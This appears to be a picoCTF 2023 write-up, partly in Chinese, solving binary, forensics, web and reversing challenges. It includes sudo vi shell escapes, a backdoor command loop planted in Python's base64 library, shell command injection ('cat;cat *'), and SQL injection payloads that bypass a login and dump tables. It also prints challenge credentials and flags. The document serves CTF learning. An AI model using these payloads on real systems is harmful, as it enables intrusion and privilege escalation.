picoCTF 2023 writeup

Binary Exploitation

hijacking

AUTHOR: THEONESTE BYAGUTANGAZA

Description
Getting root access can allow you to read the flag. Luckily there is a 
python file that you might like to play with.
Through Social engineering, we've got the credentials to use on the 
server. SSH is running on the server.

隨便逛逛


發現/challenge資料夾很可疑,但是沒辦法cd進去

查看sudo 發現使用者可以用sudo權限使用vi

exploit

1
2
3
sudo vi

:shell


privilege escalation了,再來就直接A進去/challenge/把flag撈出來就好

picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}

原本解法

這題當初在解的時候是在.server.py裡面import 的base64裡面搞鬼
只是不知道為甚麼在寫writeup的時候沒辦法用root權限執行.server.py

ls -al發現有一個.server.py

cat .server.py

1
2
3
4
5
6
7
8
9
10
11
import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)

vim .server.py沒辦法動.server.py,因為他是readonly,但是權限沒有設定到base64.py

在import file裡面加料
vim /usr/lib/python3.8/base64.py

1
2
3
4
import os
while 1:
cmd=input()
print(os.popen(cmd).read())

get shell

1
sudo python3 .server.py

Forensics

hideme

AUTHOR: GEOFFREY NJOGU

Description
Every file gets a flag.
The SOC analyst saw one image been sent back and forth between two
people. They decided to investigate and found out that there was more
than what meets the eye here.

下載下來發現是一張圖片
看一看感覺很正常

exiftool看了一下沒有把flag藏在某個欄位裡

strings flag.png看看

發現裡面有長得很像路徑的東東

直接把flag.png當成zip解壓縮看看

1
unzip flag.png

得到半張flag

picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717}

FindAndOpen

AUTHOR: MUBARAK MIKAIL

Description
Someone might have hidden the password in the trace file.
Find the key to unlock this file. This tracefile might be good to analyze.

這題給了兩個檔案,第一個是flag.zipdump.pcap
嘗試解壓縮flag.zip,發現需要密碼

先從dump.pcap下手看看

用wireshark打開dump.pcap


隨便看幾個封包後發現都有明文


找到一個超可疑的封包,=結尾很可能是base64編碼的填充字元

decode後得到半截flag

This is the secret: picoCTF{R34DING_LOKd_

回到flag.zip,直接通靈把第一段flag當密碼

picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878}

??

General Skills

money-ware

AUTHOR: JUNI19

Description
Flag format: picoCTF{Malwarename}
The first letter of the malware name should be capitalized and the rest 
lowercase.
Your friend just got hacked and has been asked to pay some bitcoins to 
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is 
going on and asks you for advice. Can you identify what malware he’s 
being a victim of?

Google 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

找到CNBC的新聞

picoCTF{Petya}

水爛

repetitions

AUTHOR: THEONESTE BYAGUTANGAZA

Description
Can you make sense of this file?
Download the file here.

下載enc_flag

1
2
3
4
5
VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh
RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk
MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW
VkpEVGxaYVdFMVhSbFZhTTBKWVZGWmFXbVZzV2tkWk0yaFRDbUpXV25sVVZtaFRWMGRHZEdWRlZs
aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg==

==經典base64

decode後

1
2
3
4
VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX
bUZTVmtwUVdWUkdibVZXVm5WUgpiSEJzWVRCd2VWVXhXbXBOUlRWSFdqTnNWZ3BYUjFKeVZGZHdW
MlZzVWxaVmJFNW9UVVJDTlZaWE1XRlVaM0JYVFZaWmVsWkdZM2hTCmJWWnlUVmhTV0dGdGVFVlhi
bTkzVDFWT2JsQlVNRXNLCg==

再decode

1
2
3
V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR
bHBsYTBweVUxWmpNRTVHWjNsVgpXR1JyVFdwV2VsUlZVbE5oTURCNVZXMWFUZ3BXTVZZelZGY3hS
bVZyTVhSWGFteEVXbm93T1VOblBUMEsK

de

1
2
WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV
WGRrTWpWelRVUlNhMDB5VW1aTgpWMVYzVFcxRmVrMXRXamxEWnowOUNnPT0K

deeee

1
2
Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN
V1V3TW1Fek1tWjlDZz09Cg==

eeeeeeee

1
cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg==

aaaaaaaaaa

1
picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}

picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}

Permissions

AUTHOR: GEOFFREY NJOGU

Description
Can you read files in the root file?
The system admin has provisioned an account for you on the main server:
ssh -p 53849 [email protected]
Password: x+T6aPgE4-
Can you login and read the root file?    

picoCTF{uS1ng_v1m_3dit0r_f6ad392b}

水爛

chrono

AUTHOR: MUBARAK MIKAIL

Description
How to automate tasks to run at intervals on linux servers?
Use ssh to connect to this server:
Server: saturn.picoctf.net
Port: 50602
Username: picoplayer 
Password: tPmsUpiHeZ

picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71}

?

useless

AUTHOR: LOIC SHEMA

Description
There's an interesting script in the user's home directory
Additional details will be available after launching your challenge instance.

picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173}

Special

AUTHOR: LT 'SYREAL' JONES

Description
Don't power users get tired of making spelling mistakes in the shell? Not
anymore! Enter Special, the Spell Checked Interface for Affecting Linux.
Now, every word is properly spelled and capitalized... automatically and 
behind-the-scenes! Be the first to test Special in beta, and feel free to
tell us all about how Special streamlines every development process that
you face. When your co-workers see your amazing shell interface, just
tell them: That's Special (TM)
Start your instance to see connection details.
Additional details will be available after launching your challenge
instance.

這題會一直把輸入的指令變成很簡單的單字,然後把開頭用成大寫
ls會變Is
cat會變Cat,但如果不是第一個字母就不會變大寫,所以可以用cat指令
; 搭配Regex Command Injection

1
cat;cat *


發現目錄下面有一個資料夾blargh

1
cat;cat blargh/*

picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59}

Reverse Engineering

Reverse

AUTHOR: MUBARAK MIKAIL

Description
Try reversing this file? Can ya?
I forgot the password to this file. Please find it for me?

題目給了一個檔案ret,執行後要輸密碼

丟GDB

1
2
3
4
start 
c
ctrl^C
ni到死


在呼叫strcmp比對密碼時把rsi dump出來,得到前半截flag

picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528

重新執行ret,輸入密碼

picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289}

Web Exploitation

More SQLi

AUTHOR: MUBARAK MIKAIL

Description
Can you find the flag on this website.
Additional details will be available after launching your challenge instance.

Bypass login

進入網頁,經典登入介面

1
2
username=admin&
password=' or 'a'='a


題目很貼心把query都print出來給你

調整一下

1
2
username=123&
password=' or 1=1;--

進入之後有一個搜尋頁面

測試有幾個欄位

1
searchInput=' union select 1,2,3;--

dump Table

1
searchInput=' or 'a'='a


沒看到flag,可能在別的table

1
' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';--

現在知道flag應該在more_tableflag_TEXT欄位

1
' union select flag,2,3 from more_table;--

picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37}

MatchTheRegex

AUTHOR: SUNDAY JACOB NWANYIM

Description
How about trying to match a regular expression
Additional details will be available after launching your challenge instance.

一開始沒看hint不知道到底要幹嘛

結果是要match^p.....F!?

picoCTF{succ3ssfully_matchtheregex_9080e406}

世紀水題

findme

AUTHOR: GEOFFREY NJOGU

Description
Help us test the form by submiting the username as test and password as test!
Additional details will be available after launching your challenge instance.

先用test test!登入

進去後他說I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)

BurpSuite查看被redirected的頁面


id看起來很像經典base64


picoCTF{proxies_all_the_way_be716d8e}